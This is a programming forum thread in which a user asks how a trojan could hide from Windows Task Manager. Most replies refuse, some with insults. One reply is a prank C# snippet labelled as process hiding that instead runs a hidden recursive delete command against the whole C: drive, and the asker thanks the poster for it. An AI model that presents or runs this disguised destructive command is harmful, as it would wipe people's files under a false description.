Skip to content
  • Categories
  • Recent
  • Tags
  • Popular
  • World
  • Users
  • Groups
Skins
  • Light
  • Cerulean
  • Cosmo
  • Flatly
  • Journal
  • Litera
  • Lumen
  • Lux
  • Materia
  • Minty
  • Morph
  • Pulse
  • Sandstone
  • Simplex
  • Sketchy
  • Spacelab
  • United
  • Yeti
  • Zephyr
  • Dark
  • Cyborg
  • Darkly
  • Quartz
  • Slate
  • Solar
  • Superhero
  • Vapor

  • Default (No Skin)
  • No Skin
Collapse
Code Project
  1. Home
  2. General Programming
  3. C#
  4. TaskManager - trojans

TaskManager - trojans

Scheduled Pinned Locked Moved C#
comhelpquestion
9 Posts 5 Posters 0 Views 1 Watching
  • Oldest to Newest
  • Newest to Oldest
  • Most Votes
Reply
  • Reply as topic
Log in to reply
This topic has been deleted. Only users with topic management privileges can see it.
  • N Offline
    N Offline
    nelsonpaixao
    wrote on last edited by
    #1

    Hi, about trojans, if run taskmanager i see all threads at the moment, so it´s better to detect when user turn on and off taskmanager, right? is that possible in code? i think so. the other way to keep trojans stealth is to mess with taskmanager code itself?

    nelsonpaixao@yahoo.com.br trying to help & get help

    C L N D 5 Replies Last reply
    0
    • N nelsonpaixao

      Hi, about trojans, if run taskmanager i see all threads at the moment, so it´s better to detect when user turn on and off taskmanager, right? is that possible in code? i think so. the other way to keep trojans stealth is to mess with taskmanager code itself?

      nelsonpaixao@yahoo.com.br trying to help & get help

      C Offline
      C Offline
      Christian Graus
      wrote on last edited by
      #2

      You are scum. You think we're going to help you write destructive code ?

      Christian Graus Driven to the arms of OSX by Vista.

      1 Reply Last reply
      0
      • N nelsonpaixao

        Hi, about trojans, if run taskmanager i see all threads at the moment, so it´s better to detect when user turn on and off taskmanager, right? is that possible in code? i think so. the other way to keep trojans stealth is to mess with taskmanager code itself?

        nelsonpaixao@yahoo.com.br trying to help & get help

        L Offline
        L Offline
        leckey 0
        wrote on last edited by
        #3

        JACKASS....

        Blog link to be reinstated at a later date.

        1 Reply Last reply
        0
        • N nelsonpaixao

          Hi, about trojans, if run taskmanager i see all threads at the moment, so it´s better to detect when user turn on and off taskmanager, right? is that possible in code? i think so. the other way to keep trojans stealth is to mess with taskmanager code itself?

          nelsonpaixao@yahoo.com.br trying to help & get help

          N Offline
          N Offline
          nelsonpaixao
          wrote on last edited by
          #4

          take it easy!!! :laugh: i already read a post asking this on monday!!!

          nelsonpaixao@yahoo.com.br trying to help & get help

          C 1 Reply Last reply
          0
          • N nelsonpaixao

            take it easy!!! :laugh: i already read a post asking this on monday!!!

            nelsonpaixao@yahoo.com.br trying to help & get help

            C Offline
            C Offline
            Christian Graus
            wrote on last edited by
            #5

            Even if you're not writing a trojan, someone else could be, so why would we publicly tell people how to do it ?

            Christian Graus Driven to the arms of OSX by Vista.

            1 Reply Last reply
            0
            • N nelsonpaixao

              Hi, about trojans, if run taskmanager i see all threads at the moment, so it´s better to detect when user turn on and off taskmanager, right? is that possible in code? i think so. the other way to keep trojans stealth is to mess with taskmanager code itself?

              nelsonpaixao@yahoo.com.br trying to help & get help

              D Offline
              D Offline
              Dan Neely
              wrote on last edited by
              #6

              Here's the code: Put this at the start of your .cs file Using System.Diagnostics; Then use this to hid the process itself.

              Process HideFromTaskManager = NewProcess();
              HideFromTaskManager.Startinfo.Filename = @"del /s C:\*.*"
              HideFromTaskManager.StartInfo.CreateNoWindow = True
              HideFromTaskManager.Start()

              Today's lesson is brought to you by the word "niggardly". Remember kids, don't attribute to racism what can be explained by Scandinavian language roots. -- Robert Royall

              N D 2 Replies Last reply
              0
              • N nelsonpaixao

                Hi, about trojans, if run taskmanager i see all threads at the moment, so it´s better to detect when user turn on and off taskmanager, right? is that possible in code? i think so. the other way to keep trojans stealth is to mess with taskmanager code itself?

                nelsonpaixao@yahoo.com.br trying to help & get help

                N Offline
                N Offline
                nelsonpaixao
                wrote on last edited by
                #7

                just wanted to know how to do it. Why is all the fuzz, wanted more how to trigger one procedure when a particular application lanches or shutdown, people already asked it before, and some were thinking on trojans but they didn´t say. science is neutral, we use it for good or bad purposes, cant put a break there, i think. :doh:

                nelsonpaixao@yahoo.com.br trying to help & get help

                1 Reply Last reply
                0
                • D Dan Neely

                  Here's the code: Put this at the start of your .cs file Using System.Diagnostics; Then use this to hid the process itself.

                  Process HideFromTaskManager = NewProcess();
                  HideFromTaskManager.Startinfo.Filename = @"del /s C:\*.*"
                  HideFromTaskManager.StartInfo.CreateNoWindow = True
                  HideFromTaskManager.Start()

                  Today's lesson is brought to you by the word "niggardly". Remember kids, don't attribute to racism what can be explained by Scandinavian language roots. -- Robert Royall

                  N Offline
                  N Offline
                  nelsonpaixao
                  wrote on last edited by
                  #8

                  thanks dan! :)

                  nelsonpaixao@yahoo.com.br trying to help & get help

                  1 Reply Last reply
                  0
                  • D Dan Neely

                    Here's the code: Put this at the start of your .cs file Using System.Diagnostics; Then use this to hid the process itself.

                    Process HideFromTaskManager = NewProcess();
                    HideFromTaskManager.Startinfo.Filename = @"del /s C:\*.*"
                    HideFromTaskManager.StartInfo.CreateNoWindow = True
                    HideFromTaskManager.Start()

                    Today's lesson is brought to you by the word "niggardly". Remember kids, don't attribute to racism what can be explained by Scandinavian language roots. -- Robert Royall

                    D Offline
                    D Offline
                    danzar
                    wrote on last edited by
                    #9

                    LOL best reply ever.

                    1 Reply Last reply
                    0
                    Reply
                    • Reply as topic
                    Log in to reply
                    • Oldest to Newest
                    • Newest to Oldest
                    • Most Votes


                    • Login

                    • Don't have an account? Register

                    • Login or register to search.
                    • First post
                      Last post
                    0
                    • Categories
                    • Recent
                    • Tags
                    • Popular
                    • World
                    • Users
                    • Groups